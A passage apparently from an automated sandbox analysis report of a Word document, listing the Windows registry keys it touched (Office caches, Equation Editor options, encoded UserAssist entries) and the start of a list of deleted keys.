1029. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\Type",
1030. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails",
1031. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url16x16",
1032. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url32x32",
1033. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url48x48",
1034. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT",
1035. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Capabilities",
1036. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ConnectMechanism",
1037. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsManaged",
1038. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsRemovable",
1039. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceOwner",
1040. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SortOrder",
1041. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SupportsMultiple",
1042. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Description",
1043. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Name",
1044. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceId",
1045. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceUrl",
1046. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails",
1047. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url16x16",
1048. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url32x32",
1049. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url48x48",
1050. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE",
1051. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Capabilities",
1052. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ConnectMechanism",
1053. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsManaged",
1054. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsRemovable",
1055. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceOwner",
1056. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SortOrder",
1057. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SupportsMultiple",
1058. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Description",
1059. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Name",
1060. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceId",
1061. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceUrl",
1062. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails",
1063. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url16x16",
1064. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url32x32",
1065. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url48x48",
1066. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE",
1067. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Capabilities",
1068. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ConnectMechanism",
1069. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsManaged",
1070. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsRemovable",
1071. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceOwner",
1072. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SortOrder",
1073. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SupportsMultiple",
1074. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\CapabilitiesMetadata",
1075. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Description",
1076. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Name",
1077. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceId",
1078. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceUrl",
1079. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata",
1080. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
1081. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
1082. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\KeyTip",
1083. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\RegularExpression",
1084. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\Type",
1085. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails",
1086. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url16x16",
1087. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url32x32",
1088. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url48x48",
1089. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\ProductFiles",
1090. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\General\\LastAutoSavePurgeTime",
1091. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
1092. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\1786DAE\\187AC9E",
1093. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090434",
1094. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457503",
1095. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033917",
1096. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457510",
1097. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001105",
1098. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033919",
1099. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457464",
1100. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457475",
1101. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033925",
1102. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033927",
1103. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457485",
1104. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033937",
1105. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001106",
1106. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033921",
1107. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457444",
1108. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090430",
1109. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457515",
1110. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457496",
1111. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033929",
1112. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457491",
1113. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001103",
1114. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001104",
1115. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328998",
1116. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328990",
1117. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328951",
1118. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328983",
1119. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328975",
1120. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328986",
1121. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328972",
1122. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328940",
1123. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328935",
1124. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328932",
1125. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328925",
1126. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328919",
1127. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328908",
1128. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328916",
1129. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328884",
1130. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM02835233",
1131. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM01840907",
1132. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851224",
1133. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851223",
1134. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851226",
1135. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851227",
1136. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851220",
1137. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851219",
1138. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851222",
1139. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851221",
1140. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851218",
1141. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851217",
1142. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851225",
1143. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851216",
1144. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998158",
1145. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998159",
1146. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328893",
1147. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328905",
1148. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F100A0C00000000000F01FEC\\Usage\\SpellingAndGrammarFiles_3082",
1149. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F100C0400000000000F01FEC\\Usage\\SpellingAndGrammarFiles_1036",
1150. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F10090400000000000F01FEC\\Usage\\SpellingAndGrammarFiles_1033",
1151. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Licensing\\09D07EFC505F4D9CBFD5ACE3217F6654",
1152. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109E60090400000000000F01FEC\\Usage\\EquationEditorFilesIntl_1033",
1153. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options",
1154. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General",
1155. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\Zoom",
1156. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\CustomZoom",
1157. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ShowAll",
1158. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\Version",
1159. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ForceOpen",
1160. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarDocked",
1161. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarShown",
1162. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarDockPos",
1163. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\MTUpgradeDialog",
1164. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes",
1165. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Full",
1166. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Script",
1167. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\ScriptScript",
1168. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Symbol",
1169. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\SubSymbol",
1170. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing",
1171. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LineSpacing",
1172. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MatrixRowSpacing",
1173. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MatrixColSpacing",
1174. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SuperscriptHeight",
1175. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SubscriptDepth",
1176. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimHeight",
1177. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimDepth",
1178. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimLineSpacing",
1179. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\NumerHeight",
1180. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\DenomDepth",
1181. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FractBarOver",
1182. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FractBarThick",
1183. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SubFractBarThick",
1184. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FenceOver",
1185. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SpacingFactor",
1186. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MinGap",
1187. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\RadicalGap",
1188. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\EmbellGap",
1189. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\PrimeHeight",
1190. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts",
1191. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Text",
1192. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Function",
1193. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Variable",
1194. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\LCGreek",
1195. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\UCGreek",
1196. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Symbol",
1197. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Vector",
1198. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Number",
1199. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\User1",
1200. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\User2",
1201. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows",
1202. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\EquationWindow",
1203. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\SpacingWindow",
1204. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\TextLanguage",
1205. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\MathLanguage",
1206. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
1207. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
1208. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\OpenWithList\\MRUList",
1209. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R\\Zvpebfbsg Bssvpr\\Bssvpr15\\JVAJBEQ.RKR",
1210. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
1211. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\S38OS404-1Q43-42S2-9305-67QR0O28SP23\\rkcybere.rkr",
1212. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.106\\CheckSetting",
1213. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.101\\CheckSetting",
1214. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.103\\CheckSetting",
1215. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.100\\CheckSetting",
1216. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.102\\CheckSetting",
1217. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.104\\CheckSetting",
1218. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr",
1219. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78.check.101\\CheckSetting"
1220.  
1221.  
1222. * Deleted Registry Keys:
1223. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\78",
1224. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\)+",
1225. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
1226. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
1227. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
1228. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
